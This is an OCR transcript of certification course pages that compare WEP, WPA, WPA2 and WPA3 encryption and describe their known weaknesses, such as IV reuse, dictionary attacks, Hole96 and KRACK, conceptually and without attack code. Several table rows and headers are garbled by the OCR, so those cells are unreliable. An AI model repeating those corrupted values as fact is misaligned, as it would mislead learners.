Chapter 11 - 02 - Understand Wireless Network Encryption Mechanisms - 03_ocred_fax_ocred.pdf

Full Transcript

Certified Cybersecurity Technician Exam 212-82 Wireless Network Security Comparison ofW'EP PR, Encryption...

Certified Cybersecurity Technician Exam 212-82 Wireless Network Security Comparison ofW'EP PR, Encryption Attributes Encryption IV Size Encryption Key Integrity Check Algorithm Key Length Management Mechanism 24-bits 40/104-bits None CRC-32 4-way Michael algorithm and WPA RC4, TKIP 48-bits 128-bits LT CRC-32 4-way WPA2 AES-CCMP 48-bits 128-bits handshake CBC-MAC AES-GCMP Arbitrary WPA3 256 length 1- 264 192-bits ECDH and ECDSA BIP-GMAC-256 P WPA2 @ Incorporates protection against forgery and replay attacks WPA3 Provides enhanced password protection and secured IoT connections; encompasses stronger encryption techniques Copyright © by EC- cil All Rights Reserved. Reproduction is Strictly Prohibited. Comparison of WEP, WPA, WPA2, and WPA3 WEP provides data confidentiality on wireless networks, but it is weak and fails to meet any of its security goals. While WPA fixes most of WEP’s problems, WPA2 makes wireless networks almost as secure as wired networks. Because WPA2 supports authentication, only authorized users can access the network. WEP should be replaced with either WPA or WPA2 to secure a Wi-Fi network. Though WPA and WPA2 incorporate protections against forgery and replay attacks, WPA3 can provide a more enhanced password-protection mechanism and secure loT connections; further, it utilizes stronger encryption techniques. The below table compares WEP, WPA, WPA2, and WPA3 in terms of the encryption algorithm used, the encryption-key size, the initialization vector (IV) it produces, key management, and data integrity. Encryption Attributes Encryption IV Size Encryption Key Integrity Check Algorithm Key Length Management Mechanism WEP RC4 24-bits 40/104-bits None CRC-32.. Michael algorithm WPA RC4, TKIP 48-bits 128-bits 4-way handshake and CRC-32 WPA2 AES-CCMP 48-bits 128-bits 4-way handshake CBC-MAC WPA3 | AES-GCMP 256 Ieggf{a_ryzm 192-bits | ECDH and ECDSA | BIP-GMAC-256 Table 11.2: Comparison of WEP, WPA, WPA2, and WPA3 Module 11 Page 1439 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Exam 212-82 Wireless Network Security Issues in WEP, WPA, and WPA2 Issues © in WEP Issues 4 in WPA Issues @ in WPA2 CRC-32 does not ensure Pre-shared key is vulnerable to Pre-shared key is vulnerable to complete cryptographic eavesdropping and dictionary eavesdropping and dictionary integrity attacks attacks Lack of forward secrecy Lack of forward secrecy IVs are 24 bits and sent in cleartext Hole96 vulnerability makes WPA2 WPA-TKIP is vulnerable to packet vulnerable to MITM and DoS spoofing and decryption attacks Vulnerable to known plaintext attacks attacks Insecure random number Insecure random number generator (RNG) in WPA allows generator (RNG) in WPA2 allow Prone to password cracking the discover of GTK generated by attackers to discover GTK attacks AP generated by AP Lack of centralized key Vulnerabilities in TKIP allow KRACK vulnerabilities make WPA2 management attackers to guess the IP address vulnerable to packet sniffing, of the subnet connection hijacking, malware injection, and decryption attacks Copyright © by EC- iL All Rights Reserved. Reproductionis Strictly Prohibited. Issues in WEP, WPA, and WPA2 Issues in WEP WEP encryption is insufficient to secure wireless networks because of certain issues and anomalies, which include the following. CRC32 is insufficient to ensure the complete cryptographic integrity of a packet: By capturing two packets, an attacker can reliably flip a bit in the encrypted stream and modify the checksum so that the packet is accepted. IVs are of 24 bits: The IV is a 24-bit field, which is too small to be secure, and is sent in the cleartext portion of a message. An AP broadcasting 1500-byte packets at 11 Mbps would exhaust the entire IV space in five hours. WEP is vulnerable to known plaintext attacks: When an IV collision occurs, it becomes possible to reconstruct the RC4 keystream based on the IV and the decrypted payload of the packet. WEP is vulnerable to dictionary attacks: Because WEP is based on a password, it is prone to password-cracking attacks. The small IV space allows the attacker to create a decryption table, which is a dictionary attack. WEP is vulnerable to DoS attacks: This is because associate and disassociate messages are not authenticated. An attacker can eventually construct a decryption table of reconstructed keystreams: With approximately 24 GB of space, an attacker can use this table to decrypt WEP packets in real time. A lack of centralized key management makes it difficult to change WEP keys regularly. Module 11 Page 1440 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Exam 212-82 Wireless Network Security = |Vis a value used to randomize the keystream value, and each packet has an IV value: The standard IV allows only a 24-bit field, which is too small to be secure, and is sent in the cleartext portion of a message. All available IV values can be used up within hours at a busy AP. IV is a part of the RC4 encryption key and is vulnerable to an analytical attack that recovers the key after intercepting and analyzing a relatively small amount of traffic. Identical keystreams are produced with the reuse of the IV for data protection because the short IV keystreams are repeated within a short time. Furthermore, wireless adapters from the same vendor may all generate the same IV sequence. This enables attackers to determine the keystream and decrypt the ciphertext. = The standard does not require each packet to have a unique IV: Vendors use only a small part of the available 24-bit possibilities. Consequently, a mechanism that depends on randomness is not random at all, and attackers can easily determine the keystream and decrypt other messages. = The use of RC4 was designed to be a one-time cipher and not intended for use with multiple messages. Issues in WPA WPA is an improvement over WEP in many ways because it uses TKIP for data encryption and helps in secured data transfer. However, WPA has many security issues as well. Some of the security issues of WPA are as described follows. = Weak passwords: If users depend on weak passwords, the WPA PSK is vulnerable to various password-cracking attacks. = Lack of forward secrecy: If an attacker captures a PSK, they can decrypt all the packets encrypted with that key (i.e., all the packets transmitted or being transmitted can be decrypted). = Vulnerability to packet spoofing and decryption: Clients using WPA-TKIP are vulnerable to packet-injection attacks and decryption attacks, which further allows attackers to hijack Transmission Control Protocol (TCP) connections. = Predictability of the group temporal key (GTK): An insecure random number generator (RNG) in WPA allows attackers to discover the GTK generated by the AP. This further allows attackers to inject malicious traffic in the network and decrypt all the transmissions in progress over the Internet. = Guessing of IP addresses: TKIP vulnerabilities allow attackers to guess the IP address of the subnet and inject small packets into the network to downgrade the network performance. Issues in WPA2 Although WPA2 is more secure than WPA, it also has some security issues, which are discussed below. = Weak passwords: If users depend on weak passwords, the WPA2 PSK is vulnerable to various attacks such as eavesdropping, dictionary, and password-cracking attacks. Module 11 Page 1441 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Exam 212-82 Wireless Network Security = Lack of forward secrecy: If an attacker captures a PSK, they can decrypt all the packets encrypted with that key (i.e., all the packets transmitted or being transmitted can be decrypted). = Vulnerability to man-in-the-middle (MITM) and denial-of-service (DoS) attacks: The Hole96 vulnerability in WPA2 allows attackers to exploit a shared group temporal key (GTK) to perform MITM and DoS attacks. = Predictability of GTK: An insecure random number generator (RNG) in WPA2 allows attackers to discover the GTK generated by the AP. This further allows attackers to inject malicious traffic in the network and decrypt all the transmissions in progress over the Internet. = KRACK vulnerabilities: WPA2 has a significant vulnerability to an exploit known as key reinstallation attack (KRACK). This exploit may allow attackers to sniff packets, hijack connections, inject malware, and decrypt packets. = Vulnerability to wireless DoS attacks: Attackers can exploit the WPA2 replay attack detection feature to send forged group-addressed data frames with a large PN to perform a DoS attack. = Insecure WPS PIN recovery: In some cases, disabling WPA2 and WPS can be a time- consuming process, in which the attacker needs to control the WPA2 PSK used by the clients. When WPA2 and WPS are enabled, the attacker can disclose the WPA2 key by determining the WPS personal identification number (PIN) through simple steps. Module 11 Page 1442 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Use Quizgecko on...
Browser
Browser